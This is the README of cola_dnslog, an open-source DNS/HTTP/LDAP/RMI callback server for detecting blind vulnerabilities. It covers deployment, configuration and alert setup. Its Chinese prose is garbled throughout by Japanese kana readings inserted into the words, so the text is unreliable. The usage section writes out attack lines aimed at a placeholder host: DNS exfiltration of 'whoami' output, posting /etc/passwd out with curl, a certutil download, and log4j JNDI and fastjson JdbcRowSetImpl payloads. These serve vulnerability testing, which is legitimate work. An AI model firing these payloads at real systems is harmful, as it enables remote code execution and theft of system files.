• 完全かんぜん开源
• 支持しじdns http ldap rmi等とう协议
• 提供ていきょうAPI调用方式ほうしき便びん于与其他工具こうぐ结合
• 支持しじ钉钉机つくえ器き人じん、Bark等とう提つつみ醒
• 支持しじdocker一いち键部署しょ

涉わたる及到技わざ术、框かまち架か：

dns http ldap rmi webui vue-element-admin fastapi sqlite

可か帮助检测漏洞ほら：

log4j2 fastjson ruoyi Spring RCE Blind SQL Bland XXE

特色とくしょく：

Dingtalk Robot Bark API ldaplog rmilog Docker

假かり设你购买的てき域いき名めい为example.com

你的vps ip为1.1.1.1

请自行ぎょう购买域いき名めい，并将域いき名めい的てき解析かいせき服ふく务器托たく管かん至いたり部署ぶしょcola_dnslog的てき服ふく务器

以godaddy为例

1. 配置はいち域いき名めい解析かいせき处右上角うえすみ三さん个点，点てん击Host Names

2. 修おさむ改あらため或ある新しん增ぞう主しゅ机つくえ名めい如下图所示しめせ，ip地ち址し填はま写うつし你的vps地ち址し即そく可か

3. 回かい到いたdns管理かんり，将はた域いき名めい服ふく务器修おさむ改あらため为ns1.example.com和わns2.example.com

因いん为一些国内网络众所周知的原因，大だい多数たすう同学どうがく使用しよう国内こくないVPS都会とかい卡在前ぜん端はしnpm构建的てき时候，目前もくぜん暂未找到更さら好このみ的てき解かい决方案あん，建けん议使用しよう国外こくがい或ある者もの网络畅通的てきVPS搭建。

欢迎大家たいか提つつみissues!

1. 下しも载源码

git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog

2. 修おさむ改あらためdocker-compose.yml中ちゅうenvironment变量

...
  server:
    ...
    environment:
      DNS_DOMAIN: example.com # 自己じこ的てき域いき名めい
      NS1_DOMAIN: ns1.example.com # ns1绑定
      NS2_DOMAIN: ns2.example.com # ns2绑定
      SERVER_IP: 1.1.1.1 # vps ip
      HTTP_PORT: 80 # httplog服ふく务端口こう
      HTTP_RESPONSE_SERVER_VERSION: nginx # httplog返かえし回かい头的服ふく务端信しん息いきServer: nginx
      LDAP_PORT: 1389 # ldaplog服ふく务端口こう
      RMI_PORT: 1099 # rmilog服ふく务端口こう
    ...
  front:
  	...
    environment:
      API_BASE_URL: 'http://1.1.1.1:28001' # http://vpsip:28001 / http://example.com:28001
    ...

3. 启动

docker-compose up -d

4. 启动之の后きさき查看docker日び志こころざし或ある者もの查看info.txt获取账号信しん息いき

server端はし程ほど序じょ运行会かい在ざい程ほど序じょ根ね目め录创建けん一いち个info.txt用よう于记录初始はじめ化か的てき账号信しん息いき

docker-compose logs
docker exec -it <container_id> cat /coladnslog/info.txt

如果需要じゅよう自じ定てい义端口こう，请修改あらためdocker-compose.yml的てき端はし口こう映うつ射いports即そく可か

服ふく务端：

git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog

docker build -t coladnslog_server -f Dockerfile_server .
docker run -itd \
-e DNS_DOMAIN=example.com \
-e NS1_DOMAIN=ns1.example.com \
-e NS2_DOMAIN=ns2.example.com \
-e SERVER_IP=1.1.1.1 \
-e HTTP_PORT=80 \
-e HTTP_RESPONSE_SERVER_VERSION=nginx \
-e LDAP_PORT=1389 \
-e RMI_PORT=1099 \
--net=host \
--name ColaDnslog_server coladnslog_server

客きゃく户端：

git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog

sudo docker build --build-arg VERSION=v1.3.2 -t coladnslog_front -f Dockerfile_front .
sudo docker run -itd \
-p 18080:80 \
-e "API_BASE_URL=http://1.2.3.4:28001" \
--name ColaDnslog_front coladnslog_front

共とも分ぶん四よん步ほ

下しも载源码

git clone https://github.com/Abelche/cola_dnslog.git

我わが习惯于将服ふく务用tmux放ひ到いた后きさき台だい运行

安あん装そうpython（python>=3.7）依よ赖

注意ちゅうい，需要じゅよう用ようpython3.7及以上じょう版本はんぽん，否いや则会有ゆう兼けん容よう性せい问题，多たpython推荐使用しようconda

cd cola_dnslog
pip install -r requirements.txt

修おさむ改あらため根ね目め录下的てきconfig.yaml

主要しゅよう需要じゅよう修おさむ改あらためDNS_DOMAIN NS1_DOMAIN NS2_DOMAIN SERVER_IP

可か选: 修おさむ改あらためHTTP_RESPONSE_SERVER_VERSION伪造http返かえし回かい中ちゅうServer字じ段だん

global:
  DB_FILENAME: sqlite.db

logserver:
  DNS_DOMAIN: example.com
  NS1_DOMAIN: ns1.example.com
  NS2_DOMAIN: ns2.example.com
  SERVER_IP: 1.1.1.1
  DNS_PORT: 53
  HTTP_HOST: 0.0.0.0
  HTTP_PORT: 80
  HTTP_RESPONSE_SERVER_VERSION: nginx
  LDAP_HOST: 0.0.0.0
  LDAP_PORT: 1389
  RMI_HOST: 0.0.0.0
  RMI_PORT: 1099

webserver:
  HOST: 0.0.0.0
  PORT: 28001
  PASSWORD_SALT: 随ずい便びん一长串字符串，如：cuau89j2iifdas8

启动webserber端はし和わlogserver端はし，注意ちゅうい这里一定要先启动webserver端はし（因いん为要先さき通どおり过webserver端初たんしょ始はじめ化か数すう据すえ库，初はつ始はじめ化か之の后きさき会かい在ざい终端输出账号、密みつ码、token、logid等とう信しん息いき。

chmod +x start_webserver
./start_webserver

chmod +x start_logserver
sudo ./start_logserver

现在来らい到いた前ぜん端はし（不ふ一定いってい要よう和わwebserver放ひ在ざい一起かずき，你甚至いたり可か以通过electron打だ包つつみ成本なりもと地ち客きゃく户端），先さき修おさむ改あらため配置はいち文ぶん件けん.env.production

cd src/front
vim .env.production

# just a flag
ENV = 'production'

# base api
VUE_APP_BASE_API = 'http://1.1.1.1:28001'

TARGET_API = 'http://1.1.1.1:28001'

然しか后きさきnpm安あん装そう依よ赖、打だ包つつみ、启动http服ふく务（这里可か以随意ずいい选择http服ふく务器，为了方便ほうべん我わが直接ちょくせつ用ようpython启动）

cd src/front
npm install
npm run build:prod

cd dist
python3 -m http.server 18001

至いたり此，三さん端はし（webserver端はし、logserver端はし、webui前ぜん端はし）已やめ经全部ぶ开启！

这时，访问http://1.1.1.1:18001应该可か以看到いた登とう录页面めん！

玩得开心！

在ざい钉钉群ぐん新建しんたけ机つくえ器き人じん，安全あんぜん设置：添加てんか自じ定てい义关键词coladnslog

并获取と到いたwebhook的てきtoken，注意ちゅうい，只ただ需要じゅよう填はま写うつしtoken即そく可か

进入webui，修おさむ改あらためDingtalk Robot Token为上文ぶん获取的てきtoken，点てん击Update保存ほぞん即そく可か

效果こうか如下：

Finb/Bark: Bark is an iOS App which allows you to push custom notifications to your iPhone (github.com)

Finb/bark-server: Backend of Bark (github.com)

同上どうじょう 进入webui，开启Bark开关，然しか后きさき修おさむ改あらためbark url，点てん击Update保存ほぞん

效果こうか如下：

上うえ文ぶん提ひっさげ到いた，假定かてい我が的てき域いき名和なわip是ぜexample.com和わ1.1.1.1，并且我わが们账户的logid为qrq

nsloopup `whoami`.qrq.example.com
ping `whoami`.qrq.example.com

curl 1.1.1.1/qrq/some/info
curl -d @/etc/passwd 1.1.1.1/qrq/postdata
certutil -urlcache -split -f http://1.1.1.1/x x

log4j2 fastjson等とう可か以使用しよう此方こちら法ほう

注意ちゅうい这里必须要よう令れい最さい后きさき路ろ径みち的てき最さい后きさき作さく为logid，如：ldapqrq xxxxqrq qrq xxx/qrq

${jndi:ldap://1.1.1.1:1389/ldapqrq}
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://1.1.1.1:1389/ldapqrq", "autoCommit":true}

同上どうじょう，log4j2 fastjson等とう

${jndi:rmi://1.1.1.1:1099/rmiqrq}
{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://1.1.1.1:1099/rmiqrq", "autoCommit":true } }

• 2023-02-03 v1.3.2
  1. 修おさむ改あらため默だま认解析かいせき记录，domain[.]com和わ*[.]domain[.]com的てきA记录查询指向しこう127.0.0.1，增加ぞうかmd5(serverip)[.]admin[.]domain[.]com作さく为域名めい访问的てき入口いりくち
  2. 修おさむ复问题：logserver报错崩くずし溃Segmentation fault issues19
  3. 修おさむ改あらため默だま认的docker前ぜん端はし部署ぶしょ方式ほうしき（无需用よう户编译）
  4. 增加ぞうか清しん除じょ日び志功しこう能のう
• 2022-08-12 v1.3.1
  1. 修おさむ复docker部署ぶしょ方式ほうしきdns端はし口こう冲突问题
• 2022-08-12 v1.3.0
  1. 创建api文ぶん档https://abelche.github.io/cola_dnslog/
  2. 更新こうしんdocker部署ぶしょ方式ほうしき
  3. 修おさむ复部分ぶぶん显示问题
• 2022-08-09 v1.2.2 v1.2.3
  1. 更新こうしんreadme
  2. 修おさむ复文件名けんめい拼写错误
• 2022-08-03 v1.2.1
  1. 更新こうしんreadme
• 2022-08-02 v1.2.0
  1. 增加ぞうかbark提ひさげ醒功能のう
  2. 修おさむ改あらためlogserver端はしhttp的てき返かえし回かい为1x1的てきgif格式かくしき图片
  3. 增加ぞうかhttp返かえし回かい包つつみ里さとServer字じ段だん的てき伪造功こう能のう
  4. 修おさむ复前端はしprofile页面开关bug
• 2022-08-01 v1.1.0
  1. 增加ぞうか重おも新しん生成せいせいtoken、修おさむ改あらため密みつ码功能のう
  2. 优化前ぜん端はし展示てんじ效果こうか，优化渲染速度そくど
  3. 增加ぞうかid排はい序じょ功こう能のう
  4. 首くび页Usage部分ぶぶん根ね据すえ服ふく务端自じ动生成せいせい
  5. 增加ぞうか钉钉机つくえ器き人じん
  6. 修おさむ复rmi协议解析かいせきbug
• 2022-07-30 v1.0.0
  1. cola_dnslog发布 v1.0.0

• 联动钉钉【2022-07-31】
• 联动bark【2022-08-02】
• 添加てんかapi文ぶん档【2022-08-12】
• 增加ぞうかip属地ぞくち功こう能のう
• docker一いち键部署しょ【2022-08-12】
• 其他协议
• 增加ぞうかmysql等とう数すう据すえ库的支持しじ

本ほん项目使用しよう Apache License 2.0

Cola Dnslog 现已加入かにゅう 404星ほし链计划

Weik1 🐡

• https://panjiachen.github.io/vue-element-admin-site/zh/
• https://github.com/NickstaDB/SerializationDumper
• https://docs.oracle.com/javase/7/docs/technotes/guides/rmi/faq.html#netcontact
• http://www.hackdig.com/02/hack-596460.htm
• 太ふと多た了りょう没ぼつ法ほう一いち一いち列れつ出で......................

师傅们可以加我わがwx，一起かずき交流こうりゅう进步RG9nZ3lDaGVuZwo=